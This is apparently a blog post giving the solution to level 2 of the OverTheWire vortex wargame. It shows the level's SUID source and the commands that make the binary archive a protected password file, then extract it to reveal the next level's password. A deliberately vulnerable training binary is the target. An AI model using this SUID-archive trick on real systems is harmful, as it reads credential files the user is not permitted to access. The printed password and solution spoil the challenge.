Saturday, June 4, 2011

vortex2

Solution for OTW wargame vortex, level 2
#include 
#include 
#include 


int main(int argc, char **argv)
{
        char *args[] = { "/bin/tar", "cf", "/tmp/ownership.$$.tar", argv[1], argv[2], argv[3] };
        execv(args[0], args);
}

$ /vortex/vortex2 /etc/vortex_pass/vortex3
$ tar xfO /tmp/ownership.\$\$.tar
64ncXTvx#

Notes:
Both the password-file and the vortex2-binary belong to user vortex3. The binary also has the SUID-bit set for execution, this means the process will be run as user vortex3, which is the only user which has read/write permissions on the password file.
$ ls -al /etc/vortex_pass/vortex3
-r-------- 1 vortex3 vortex3 10 2011-11-14 18:15 /etc/vortex_pass/vortex3
$ ls -la /vortex/vortex2
-r-sr-x--- 1 vortex3 vortex2 7134 2011-11-13 23:07 /vortex/vortex2

The call to the vortex2-binary creates a tar-archive in /tmp. I first thought $$ would be evaluated to the PID of the running shell, in order to create one file per bash-user, but actually the file name is treated literally.

One can specify up to 3 additional arguments to tar, one is enough to specify which file to include in the archive.